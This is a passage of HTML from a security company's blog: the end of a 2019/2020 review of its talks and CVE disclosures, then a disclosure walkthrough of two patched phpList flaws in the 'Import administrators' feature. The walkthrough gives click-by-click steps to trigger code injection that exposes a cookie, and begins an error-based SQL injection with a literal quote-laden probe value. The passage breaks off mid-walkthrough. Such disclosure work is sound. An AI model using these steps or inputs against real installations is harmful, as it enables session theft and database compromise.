href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAsSf88GHG2g03vFWrV9wukXt0fMXi4DGLZQeZigD9zqH5pHC3DXbUToL9Mql2pvF4Mdby-rn7OzZNLgcBJ_oF3uRZjMs2bdtsCH8g1AELzLmGDnnbgoMDmDygLGgcgpoYPjxcrUJDpHOk/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1271" data-original-width="2048" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAsSf88GHG2g03vFWrV9wukXt0fMXi4DGLZQeZigD9zqH5pHC3DXbUToL9Mql2pvF4Mdby-rn7OzZNLgcBJ_oF3uRZjMs2bdtsCH8g1AELzLmGDnnbgoMDmDygLGgcgpoYPjxcrUJDpHOk/w640-h398/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The core GOON team for DC2711 – thank you again!</td></tr></tbody></table><br /><br /><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV-VgTdCJYfw76BL38-Utp2btSP67CkLoOIRbrag_WlZqtqD2Oes38uFfPB1-usXtHWEn37_QDzsUNbNXWRRwG6FglFjkUJ4-KT2DfOfKXJW3SBU6y-ApWP7-61fY3tq1i-n_6aVkuoh-2/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="145" data-original-width="392" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV-VgTdCJYfw76BL38-Utp2btSP67CkLoOIRbrag_WlZqtqD2Oes38uFfPB1-usXtHWEn37_QDzsUNbNXWRRwG6FglFjkUJ4-KT2DfOfKXJW3SBU6y-ApWP7-61fY3tq1i-n_6aVkuoh-2/w400-h148/image.png" width="400" /></a></div><br /><span style="font-size: large;">We were also Gold Sponsors of BSides Cape Town 2019 and Amy’s talk was also accepted (this talk was first completed at DC2711)!</span><div><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_zi3HMfYTTdvJJ8ZK3YuqxrkiPz0QHf-5RxXJtVnO43LmLD722YA8JHphl3dlBF39PE9maGydG5sx3SwwwaMejxXVq8D7Pl3mJPKasRZDEnZr7CXehBtNpDKTobzYcIrBiLddv8Q6GpWV/" style="margin-left: auto; 
margin-right: auto;"><img data-original-height="546" data-original-width="971" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_zi3HMfYTTdvJJ8ZK3YuqxrkiPz0QHf-5RxXJtVnO43LmLD722YA8JHphl3dlBF39PE9maGydG5sx3SwwwaMejxXVq8D7Pl3mJPKasRZDEnZr7CXehBtNpDKTobzYcIrBiLddv8Q6GpWV/w640-h360/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">On our way to BSides Cape Town!!!!!</td></tr></tbody></table><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVjvB0D22SWpZyo2KmJ7bpfNISR8jT_48uP7gi83gnKAO6CLw2C9I508d06U0mh2QE2Kd7Yka0OXtZcPfSC9EQYgUoDX3qhkC5tDuSbsTJnUqaet91wIyMPfnzvo-cgX_SL_zYv6WmrAw8/" style="margin-left: auto; margin-right: auto;"><img data-original-height="546" data-original-width="971" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVjvB0D22SWpZyo2KmJ7bpfNISR8jT_48uP7gi83gnKAO6CLw2C9I508d06U0mh2QE2Kd7Yka0OXtZcPfSC9EQYgUoDX3qhkC5tDuSbsTJnUqaet91wIyMPfnzvo-cgX_SL_zYv6WmrAw8/w640-h360/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Amy Manià giving her talk “Put words in my mouth” although we all know it as the “deep throat” talk.</td></tr></tbody></table><br /><span style="font-size: large;">Amy’s talk is accessible online at <a href="https://www.youtube.com/watch?v=4R-g90lplco">https://www.youtube.com/watch?v=4R-g90lplco</a>. 
</span></div><div><br /></div><div><h2 style="text-align: left;">Research / Dropping them 0days</h2><p></p><p><span style="font-size: large;">In 2019 and 2020 we discovered and reported on a number of vulnerabilities, some of the main ones being:</span></p><p></p><ul style="text-align: left;"><li><span style="font-size: large;">QNAP - CVE-2019-7181 (<a href="https://www.qnap.com/en/security-advisory/nas-201905-09">https://www.qnap.com/en/security-advisory/nas-201905-09</a>)</span></li><li><span style="font-size: large;">phpList – CVE-2020-15072 & CVE-2020-15073 (<a href="https://blog.telspace.co.za/2020/07/phplist-cve-2020-15072-cve-2020-15073.html">https://blog.telspace.co.za/2020/07/phplist-cve-2020-15072-cve-2020-15073.html</a>)</span></li><li><span style="font-size: large;">Pi-hole Code Injection – CVE-2020-14971 (<a href="https://blog.telspace.co.za/2020/06/pi-hole-code-injection-cve-2020-14971.html">https://blog.telspace.co.za/2020/06/pi-hole-code-injection-cve-2020-14971.html</a>)</span></li></ul><p></p><p><span style="font-size: large;">We also released a tool called Travesty, which is a directory and file enumeration tool (post exploitation). 
This can be downloaded at <a href="https://github.com/telspacesystems/travesty">https://github.com/telspacesystems/travesty</a>.</span></p><p><span style="font-size: large;">For additional information on these and the others we released / published this year, refer to <a href="https://blog.telspace.co.za/">https://blog.telspace.co.za/</a>.</span></p><p><span style="font-size: large;">During DEF CON Safe Mode (DC28), Greg, Amy and Derek presented at the “War Story Bunker” event (Friday 7th August 2020), telling a pentesting story that caused a lot of big laughs and surprised faces. Unfortunately these sessions are not recorded for various reasons, but more information about DC28 can be found at <a href="https://www.defcon.org/html/defcon-safemode/dc-safemode-schedule.html">https://www.defcon.org/html/defcon-safemode/dc-safemode-schedule.html</a>.</span></p><p><span style="font-size: large;">Amy Mania also represented Telspace during a Woven Experiences podcast with Melissa Monnig; the interview can be listened to on Spotify at:</span></p><p></p><ul style="text-align: left;"><li><span style="font-size: large;"><a href="https://open.spotify.com/episode/4Co0Vo6xW3sziq77aWBa0Z?si=w_13wOjZRLyU1XvMGQHJNw">https://open.spotify.com/episode/4Co0Vo6xW3sziq77aWBa0Z?si=w_13wOjZRLyU1XvMGQHJNw</a></span></li></ul><p></p><p><span style="font-size: large;">Throughout the year we also participated in other local and international conferences and round table events, and provided comments on news stories in the media.</span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMXcYJtMwjVsHfIZh-TPfLxgF7fxz5k0fC2KEBwU70vb6wL10nELJe0NdngpzonP8wNc-No1iEq9qAenYNbtZ3osNDpHSaJ6laCt67AC12oBry0hWA0-2VIBWXEVMl7-dPbMFYI1JhrvWe/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="330" data-original-width="1134" height="186" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMXcYJtMwjVsHfIZh-TPfLxgF7fxz5k0fC2KEBwU70vb6wL10nELJe0NdngpzonP8wNc-No1iEq9qAenYNbtZ3osNDpHSaJ6laCt67AC12oBry0hWA0-2VIBWXEVMl7-dPbMFYI1JhrvWe/w640-h186/image.png" width="640" /></a></div><br /><p></p><div><span style="font-size: large;">Last but not least, our CEO and Founder (Dino Covotsos) is officially part of the DEF CON Review board (Talks and Workshops). This is a great achievement, particularly in representing South Africa at such an international level. More information can be found at: https://www.defcon.org/html/defcon-27/dc-27-cfp-review-board.html <br />In closing, we would like to thank everyone who made our 2019/2020 so amazing. A huge thank you to our staff, clients, employees, friends and, most importantly, the local and international Information Security community. <br />We wish you all the best and a prosperous year for 2021.</span></div></div><br />
<p>Posted by break2fix (http://www.blogger.com/profile/06040620743029387401)</p>
<p><span style="font-size: x-large;"><b>phpList – CVE-2020-15072 & CVE-2020-15073 – Story Time</b></span></p>
<p>Published 2020-07-09T11:06:00.000+02:00, updated 2020-07-22T11:54:43.225+02:00</p>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">phpList is currently used in 73 countries and is a popular choice for sending email newsletters, marketing campaigns and announcements. It is accessible via web browsers and is Open Source (<a href="https://www.phplist.org/" style="color: purple; text-decoration: underline;">https://www.phplist.org</a>); however, a paid-for version also exists as a service via <a href="https://www.phplist.com/" style="color: purple; text-decoration: underline;">https://www.phplist.com</a>.</span></span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">Given its wide use / adoption, I decided to take a look at phpList recently, in order to give back to the Open Source community. <o:p></o:p></span></span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">I would also like to give credit to phpList for responding and patching very quickly, especially to Suela at phpList. A new version of the application is now available for download.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">You can browse all the fixes, comments and patches at the following URLs:</span></span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit; font-size: large;"><span style="mso-list: Ignore;">·<span style="font-stretch: normal; font-style: normal; font-variant-caps: normal; font-weight: normal; line-height: normal;"> </span></span><!--[endif]--><span lang="EN-US"><a href="https://discuss.phplist.org/t/phplist-3-5-5-has-been-released/6377" style="color: purple; text-decoration: underline;"><span lang="EN-US"><span lang="EN-US">https://discuss.phplist.org/t/phplist-3-5-5-has-been-released/6377</span></span></a></span><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit; font-size: large;"><span style="mso-list: Ignore;">·<span style="font-stretch: normal; font-style: normal; font-variant-caps: normal; font-weight: normal; line-height: normal;"> </span></span><!--[endif]--><span lang="EN-US"><a href="https://www.phplist.org/newslist/phplist-3-5-5-release-notes/" style="color: purple; text-decoration: underline;"><span lang="EN-US"><span lang="EN-US">https://www.phplist.org/newslist/phplist-3-5-5-release-notes/</span></span></a></span><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit; font-size: large;"><span style="mso-list: Ignore;">·<span style="font-stretch: normal; font-style: normal; font-variant-caps: normal; font-weight: normal; line-height: normal;"> </span></span><!--[endif]--><span lang="EN-US"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15072" style="color: purple; text-decoration: underline;"><span lang="EN-US"><span lang="EN-US">https://cve.mitre.org/cgi-bin/cvename.cgi<span lang="EN-US">?name=CVE-2020-15072</span></span></span></a></span></span><o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit; font-size: large;"><span style="mso-list: Ignore;">·<span style="font-stretch: normal; font-style: normal; font-variant-caps: normal; font-weight: normal; line-height: normal;"> </span></span><!--[endif]--><span lang="EN-US"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15073" style="color: purple; text-decoration: underline;"><span lang="EN-US"><span lang="EN-US">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15073</span></span></a></span><o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<br />
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">A walkthrough of the 2 identified vulnerabilities is given below:</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;"><br /></span></span></div>
<h2>
<b><span lang="EN-US">1.) Code Injection via "Import administrators"</span></b></h2>
<div class="MsoNormal" style="font-size: medium;">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.1) Click on "Config" then "Import administrators"</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span lang="EN-US"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyPppFv3ohHM2NT1LjJ6s6I6dhOId6El8OY15d4uKYzX-bfUk0zmqTqsHTyZ97n0JivDXXM-TtNJ_NB_qf2honm_ZGUA_fRzetB2a9KfiqzLIqKmqmVw_exQu672KG-VabCZEOhnFhKl61/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="453" data-original-width="900" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyPppFv3ohHM2NT1LjJ6s6I6dhOId6El8OY15d4uKYzX-bfUk0zmqTqsHTyZ97n0JivDXXM-TtNJ_NB_qf2honm_ZGUA_fRzetB2a9KfiqzLIqKmqmVw_exQu672KG-VabCZEOhnFhKl61/s640/1.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.2) Edit a txt file to include basic headers and test (offline) as follows:</span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwPKOi0iGqIe0P3pEW5ftErTZiITJk3xBIJmAw3O-19vuwQWYBj4GNwwQ-0oSyK-_eTQrZk2_Npa67HvarILopXHA5UDdsh7eIycClbmE4TX6wFyx4T-SZxQlOuWcDPCalcysQ2WH6C_9Q/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="132" data-original-width="898" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwPKOi0iGqIe0P3pEW5ftErTZiITJk3xBIJmAw3O-19vuwQWYBj4GNwwQ-0oSyK-_eTQrZk2_Npa67HvarILopXHA5UDdsh7eIycClbmE4TX6wFyx4T-SZxQlOuWcDPCalcysQ2WH6C_9Q/s640/2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.3) Click on "Choose File" and select the text file.</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvh7iweU5AySwLlTQa2RuAdW2-tc-73isJPSOxgTHsmIEo6G9w4YIYOBhFSo8kHa71vEiU9Dz-Vm7P1B6JpIp-jZxSWGv0tjzDfjyIoeI4y82MFKptTb7y3LlUQVYRJuraMIOpfHdIB6Lu/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="419" data-original-width="900" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvh7iweU5AySwLlTQa2RuAdW2-tc-73isJPSOxgTHsmIEo6G9w4YIYOBhFSo8kHa71vEiU9Dz-Vm7P1B6JpIp-jZxSWGv0tjzDfjyIoeI4y82MFKptTb7y3LlUQVYRJuraMIOpfHdIB6Lu/s640/3.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.4) Click "Do Import"<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">Code Injection Triggered (not stored)</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgic4AdLYhrsjAfipXHah1jXJDYLtpkaAHa5MGpgksN81r4WA1P1vn4QGP_u2gAIM5rSOM_gwQ4EIGtOJI2RgapaXxK6eKVIXL7clJet__4k3lVGubPvxORvmYW4ttLlCPOAtyjibMJ10c9/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="311" data-original-width="900" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgic4AdLYhrsjAfipXHah1jXJDYLtpkaAHa5MGpgksN81r4WA1P1vn4QGP_u2gAIM5rSOM_gwQ4EIGtOJI2RgapaXxK6eKVIXL7clJet__4k3lVGubPvxORvmYW4ttLlCPOAtyjibMJ10c9/s640/4.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.5) Go back to "Import administrators"<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.6) Untick "Test output:"</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8b584eyAG_Cqdq1QWpLy7l_bAUfDYObDBi9IqsXzMWabTnszBBGiF-BWhyveTamgXeKp0adf6x7c4m4i8NVL1SqyWWgsK_yV2mR7fEh7y7h3PJiWZQr4u5hULLCLoK88w31Nty2qxgZgb/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="415" data-original-width="900" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8b584eyAG_Cqdq1QWpLy7l_bAUfDYObDBi9IqsXzMWabTnszBBGiF-BWhyveTamgXeKp0adf6x7c4m4i8NVL1SqyWWgsK_yV2mR7fEh7y7h3PJiWZQr4u5hULLCLoK88w31Nty2qxgZgb/s640/5.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;"><span style="font-family: inherit;">1.7) Click "Do Import" and you will get an import database error.</span><o:p></o:p></span></span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuQW9yZdQfPXYvY4o7KKWn5jZXWM0dLt8PP3yszwY8EyWpflF3X7hKTx1-a5kQWPwZATPTTKB-MF0FmkO85rbtVihefHLTB2S7GlJ4j8Urn9P2spbpQzc3dxve1POff7ICjdW3NIVirALs/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="265" data-original-width="900" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuQW9yZdQfPXYvY4o7KKWn5jZXWM0dLt8PP3yszwY8EyWpflF3X7hKTx1-a5kQWPwZATPTTKB-MF0FmkO85rbtVihefHLTB2S7GlJ4j8Urn9P2spbpQzc3dxve1POff7ICjdW3NIVirALs/s640/6.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;"><span style="font-family: inherit;">1.8) Edit the same text file and add another user as follows:</span></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPmTAJndxRf4vcUsSPNjYZiYFYVyIQXxnz0cfMzC-y2v7vAb31Yfkoadpk4seiDbHflcZquH3WfwKtlKPQP1p_K0j1ca4t4_9V6I6U3Ke0Furh26KRswcWiXmki3QfSJuUik4-GdTlWNn/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="134" data-original-width="900" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPmTAJndxRf4vcUsSPNjYZiYFYVyIQXxnz0cfMzC-y2v7vAb31Yfkoadpk4seiDbHflcZquH3WfwKtlKPQP1p_K0j1ca4t4_9V6I6U3Ke0Furh26KRswcWiXmki3QfSJuUik4-GdTlWNn/s640/7.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.9) Go back to "Import administrators"<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.10) Click on "Choose File" and choose the text file.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.11) Untick "Test output:"</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0ofAb_8LvIb0FHFjkG4YLlqh0np36tRl5VoH9Amh3KWd1eg4k9DSfvCRyJr-Fj-OLeYcE7g3xpT_BN_jFiNAc2ViANCzVvsePsaWfXQ7QANTcP_a_dbp5II_SRiDtyAvCrrz1_PUTbmFC/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="413" data-original-width="900" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0ofAb_8LvIb0FHFjkG4YLlqh0np36tRl5VoH9Amh3KWd1eg4k9DSfvCRyJr-Fj-OLeYcE7g3xpT_BN_jFiNAc2ViANCzVvsePsaWfXQ7QANTcP_a_dbp5II_SRiDtyAvCrrz1_PUTbmFC/s640/8.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.12) Click "Do Import" and you will get more import database errors<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.13) Browse to "Subscribers" then "Subscriber Lists"</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPmMrCXyHEnVbqdoC87sIqCwbs_1r2OBaPy5pLCrT-8xLboYFBBziDyGk7AQzeEUeGudQDBrLbtYAmxD6T05ZTw9V8wUE2xRiXkFj0bCsLT00X9DokwYJPwnVNm16KdTaovRC2zr4CjsMR/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="461" data-original-width="898" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPmMrCXyHEnVbqdoC87sIqCwbs_1r2OBaPy5pLCrT-8xLboYFBBziDyGk7AQzeEUeGudQDBrLbtYAmxD6T05ZTw9V8wUE2xRiXkFj0bCsLT00X9DokwYJPwnVNm16KdTaovRC2zr4CjsMR/s640/9.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.14) Click on the first one and you'll get a "hi" popup:</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh39UGw9sJIAMhVI9OagcsCODm4um9qGrSUPnN9blTxDANPcCWGOqdlr8LCdqoesEc0NjOuvlnQlY3r2SHquH3xReuKuXw688xrUDZJHli4JqyrTOrKDBsODcZZLdgcWnhGu4VoY3nJNoOQ/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="142" data-original-width="898" height="99" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh39UGw9sJIAMhVI9OagcsCODm4um9qGrSUPnN9blTxDANPcCWGOqdlr8LCdqoesEc0NjOuvlnQlY3r2SHquH3xReuKuXw688xrUDZJHli4JqyrTOrKDBsODcZZLdgcWnhGu4VoY3nJNoOQ/s640/10.png" width="640" /></a></div>
<div class="MsoNormal">
<span style="font-family: inherit; font-size: large;"> 1.15) Go back and click on the second one and you'll get a cookie.</span><br />
<div class="MsoNormal" style="font-size: medium;">
<span lang="EN-US"><o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz07ar6YdyKGZ4K_aLR8G8M8m2SgktgbWypmtca56Qfbri2sDeRoI0L4czb8j-qkQSpW5gsDrsk9XSpILHpLIqjhPAxcI8KoKLHA5izCV-F2bRdBYBp0fGN1MeisNeSydKDVfZd3YrYEBT/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="248" data-original-width="900" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz07ar6YdyKGZ4K_aLR8G8M8m2SgktgbWypmtca56Qfbri2sDeRoI0L4czb8j-qkQSpW5gsDrsk9XSpILHpLIqjhPAxcI8KoKLHA5izCV-F2bRdBYBp0fGN1MeisNeSydKDVfZd3YrYEBT/s640/11.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2>
<b><span lang="EN-US">2.) Error based SQL Injection via "Import administrators"</span></b></h2>
<div class="MsoNormal" style="font-size: medium;">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">2.1) Click on "Config" then "Import administrators"<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">2.2) Edit a text file (offline) to include basic headers and text as follows:<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">email loginname password<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">test2@test.com "'testsql test</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGbYsXFzmDJ5iWWP4c2HzU40ddbxAVCm1t7W6_lM0hJElHVusQDZKq1wPs8RUNLP1bOJouI4YK_1muJqlVjErI9Hfa9aIMrU7ujCbDfuHuY62JItMbuki0__Em9n12PHil7WeLaCfwJXkn/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="111" data-original-width="900" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGbYsXFzmDJ5iWWP4c2HzU40ddbxAVCm1t7W6_lM0hJElHVusQDZKq1wPs8RUNLP1bOJouI4YK_1muJqlVjErI9Hfa9aIMrU7ujCbDfuHuY62JItMbuki0__Em9n12PHil7WeLaCfwJXkn/s640/12.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">2.3) Untick "Test output:"</span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit; font-size: large;">2.4) Click on "Choose File" and choose the text file.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: start;"></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
